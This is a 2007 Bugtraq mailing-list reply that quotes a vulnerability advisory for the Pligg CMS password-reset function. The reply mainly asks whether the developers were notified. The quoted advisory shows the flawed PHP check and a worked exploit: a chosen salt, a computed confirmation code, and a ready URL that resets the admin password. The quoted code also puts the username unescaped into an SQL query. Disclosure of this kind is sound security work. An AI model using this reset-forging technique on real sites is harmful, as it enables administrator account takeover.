[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <41011d980705252357t96a4c52yecc38c7c1bcf2204@mail.gmail.com>
Date: Sat, 26 May 2007 12:27:54 +0530
From: "crazy frog crazy frog" <i.m.crazy.frog@...il.com>
To: "242th section" <242th.section@...il.com>
Cc: bugtraq@...urityfocus.com
Subject: Re: Pligg critical vulnerability
have you notified to the pligg developers?i think they have well
defined policy for discloser?
On 5/25/07, 242th section <242th.section@...il.com> wrote:
> Pligg critical vulnerability
>
> Concerned version : 9.5 and ?
>
> Description :
>
> Pligg is a flexible CMS based on PHP and MYSQL.
>
> To reinitialize a forgotten password, Pligg follows a classical
> process. A confirmation code is generated and sent by email to the
> concerned user mail box. The user has to follow the link containing
> the confirmation code and if the confirmation code is checked
> successfully, the password is reinitialized to a pre-defined value.
>
>
> you can find a part of the source code in charge of this check below :
>
>
> WEB_ROOT/libs/html1.php
>
>
> […]
>
> function generateHash($plainText, $salt = null){
>
> if ($salt === null) {
>
> $salt = substr(md5(uniqid(rand(), true)), 0, SALT_LENGTH); }
>
> else {
>
> $salt = substr($salt, 0, SALT_LENGTH);
>
> }
>
> return $salt . sha1($salt . $plainText);
>
> }
>
> […]
>
>
>
> WEB_ROOT/login.php :
>
>
> […]
>
> $confirmationcode = $_GET["confirmationcode"];
>
> if(generateHash($username, substr($confirmationcode, 0, SALT_LENGTH))
> == $confirmationcode){
>
> $db->query('UPDATE `' . table_users . '` SET `user_pass` =
> "033700e5a7759d0663e33b18d6ca0dc2b572c20031b575750" WHERE `user_login`
> = "'.$username.'"');
>
> […]
>
>
>
> Unfortunately, as you can read, you can easily generate, for a given
> username, a confirmation code that passes successfully the following
> check "if(generateHash($username, substr($confirmationcode, 0,
> SALT_LENGTH)) == $confirmationcode)"
>
>
> Example :
>
>
> Let's choose :
> salt = 123456789
>
> and,
>
> username = admin
>
> we have :
>
> sha1(123456789admin) = 1e2f566cbda0a9c855240bf21b8bae030404cad7
>
> and thus :
>
> confirmationcode = 1234567891e2f566cbda0a9c855240bf21b8bae030404cad7
>
> with the following url you can reinitialize the user admin password :
>
>
> http://www.domain.com/login.php?processlogin=4&username=admin&confirmationcode=1234567891e2f566cbda0a9c855240bf21b8bae030404cad7
>
>
> 242th.section.
>
--
---------------------------------------
http://www.secgeeks.com
get a blog on SecGeeks :)
register here:-
http://secgeeks.com/user/register
rss feeds :-
http://secradar.com/node/feed
http://www.newskicks.com
Submit and kick for new stories from all around the world.
---------------------------------------
Powered by blists - more mailing lists